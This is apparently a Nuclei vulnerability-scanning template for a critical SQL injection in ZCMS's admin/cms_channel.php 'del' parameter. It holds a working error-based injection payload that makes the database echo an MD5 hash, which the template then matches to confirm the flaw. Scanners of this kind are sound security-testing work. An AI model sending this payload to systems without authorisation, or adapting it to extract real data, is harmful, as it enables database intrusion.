id: zcms-v3-sqli

info:
  name: ZCMS - SQL Injection
  author: princechaddha
  severity: critical
  description: ZCMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.anquanke.com/post/id/183241
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: zcms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100f708784a4713a402903ba363830b0212e92960360a6bb04cacf76761c974fb0c02206e45c18ab306579b394346a41914b14e7bdc0c1f4868dc916bf65d875cdd5a71:922c64590222798bb761d5b6d8e72950
